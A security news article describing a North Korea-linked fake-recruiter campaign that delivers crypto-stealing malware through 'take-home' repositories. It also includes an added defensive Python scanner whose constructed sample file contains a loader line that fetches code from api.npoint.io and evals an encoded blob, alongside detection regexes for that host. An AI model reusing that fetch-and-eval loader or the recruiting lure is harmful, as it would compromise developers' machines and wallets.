The North Korea-linked Lazarus Group has been attributed to an active campaign that uses fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver malware capable of infecting Windows, macOS and Linux systems.
According to cybersecurity company Bitdefender, the scam begins with a message on the professional social network that lures targets with the promise of remote work, part-time flexibility and good pay.
"Once the target expresses interest, the 'hiring process' unfolds, and the scammer asks for a resume or even a personal GitHub repository link," the Romanian firm noted in a report shared with The Hacker News.
"Although seemingly innocent, these requests can serve malicious purposes, such as harvesting personal data or lending an air of legitimacy."
After the requested details have been handed over, the attack moves to the next stage: the threat actor, still posing as a recruiter, shares a link to a GitHub or Bitbucket repository containing a minimum viable product (MVP) version of a supposed decentralized exchange (DEX) project and instructs the victim to check it out and provide feedback.
Present in that code is an obfuscated script configured to fetch a next-stage payload from api.npoint[.]io: a cross-platform JavaScript information stealer capable of collecting data from various cryptocurrency wallet extensions.
The stealer also doubles as a loader for a Python-based backdoor responsible for monitoring changes to the clipboard contents, maintaining persistent remote access and dropping additional malware.
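A pre-run triage check of the kind a candidate could apply to such an "assignment" repository before executing anything in it, added here as an example and not code from Bitdefender's report. It looks for the two indicators described above: a script that references the api.npoint[.]io payload host, and obfuscation in the form of `eval`/`Function` applied to a long encoded string or packed one-line code. The sample repository files are constructed for the demo, and the string-length and line-length thresholds are assumptions.

```python
"""Triage a cloned repository for the indicators named in the Bitdefender
report before anyone runs it.  Added example: walks a checkout, flags files
that reference the api.npoint.io payload host or pass long encoded blobs to
eval/Function.  Sample files are constructed; thresholds are assumptions."""
import os
import re
import tempfile
from pathlib import Path

# Payload host named in the report (assumption: plain substring match is enough).
NPOINT_RE = re.compile(r"api\.npoint\.io", re.IGNORECASE)
# Dynamic-code sinks; flagged only when fed a long encoded literal on the same line.
DYN_EVAL_RE = re.compile(r"\b(?:eval|Function)\s*\(")
# A quoted run of 200+ base64/hex-escape characters (assumed threshold).
LONG_STRING_RE = re.compile(r"""['"][A-Za-z0-9+/=\\x]{200,}['"]""")
SUSPECT_EXT = {".js", ".mjs", ".cjs", ".ts", ".py", ".json"}
MAX_LINE_LEN = 2000  # assumed marker for packed/minified code
SKIP_DIRS = {".git", "node_modules"}


def scan_file(path) -> list[str]:
    """Return human-readable findings for one file (empty list if clean)."""
    path = Path(path)
    findings = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    if NPOINT_RE.search(text):
        findings.append("remote payload host api.npoint.io referenced")
    for lineno, line in enumerate(text.splitlines(), 1):
        if len(line) > MAX_LINE_LEN:
            findings.append(f"line {lineno}: {len(line)}-char line (packed/minified?)")
        if DYN_EVAL_RE.search(line) and LONG_STRING_RE.search(line):
            findings.append(f"line {lineno}: eval/Function over a long encoded string")
    return findings


def scan_repo(root: str) -> dict[str, list[str]]:
    """Map relative file path -> findings, for every suspicious file under root."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            p = Path(dirpath) / name
            if p.suffix.lower() in SUSPECT_EXT:
                hits = scan_file(p)
                if hits:
                    report[str(p.relative_to(root))] = hits
    return report


# Constructed sample files standing in for a "DEX MVP" take-home repository.
CLEAN_JS = "import { ethers } from 'ethers';\nexport function quote(a, b) { return a / b; }\n"
SUSPECT_JS = (
    "// constructed sample: loader that fetches a second stage, then eval's a blob\n"
    "const u = 'https://api.npoint.io/PLACEHOLDER-ID';\n"
    "fetch(u).then(r => r.text()).then(t => eval('" + "A" * 240 + "'));\n"
)


def build_demo_repo() -> str:
    """Write the constructed sample repository to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="dex-mvp-")
    (Path(root) / "src").mkdir()
    (Path(root) / "src" / "pricing.js").write_text(CLEAN_JS)
    (Path(root) / "src" / "config-loader.js").write_text(SUSPECT_JS)
    (Path(root) / "README.md").write_text("# DEX MVP (constructed demo)\n")
    return root


if __name__ == "__main__":
    demo = build_demo_repo()
    for rel, hits in scan_repo(demo).items():
        print(rel)
        for h in hits:
            print("  -", h)
```

The heuristics are deliberately narrow so they stay explainable: a hit means "read this file before running `npm install` or the project", not "this is malware". Real obfuscators vary, so the eval-over-blob check will miss many variants; the host reference is the higher-confidence signal for this particular campaign.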
It is worth noting that the tactics documented by Bitdefender overlap with the well-known attack cluster tracked as Contagious Interview, which is known to drop a JavaScript stealer called BeaverTail and a Python implant called InvisibleFerret.
The Python malware is in turn used to deploy a .NET binary that can siphon data, log keystrokes and mine cryptocurrency.
"The threat actors' infection chain is complex, containing malicious software written in multiple programming languages and using a variety of technologies, such as multi-layered Python scripts that recursively decode and execute themselves, a JavaScript stealer that acts as the first stage and retrieves further payloads, and .NET-based stagers capable of disabling security tools, configuring a proxy and launching crypto miners," Bitdefender said.
Reports shared on LinkedIn and Reddit suggest the same activity is recurring with minor variations to the overall attack chain. In some cases, candidates are asked to clone a Web3 repository and run it locally as part of the interview process; in others, they are instructed to deliberately introduce bugs into the code.
One of the Bitbucket repositories mentioned refers to a project named "miketoken_v2", which is no longer available on the code hosting platform.
The disclosure comes a day after SentinelOne revealed that the Contagious Interview campaign is being used to deliver another piece of malware called FlexibleFerret.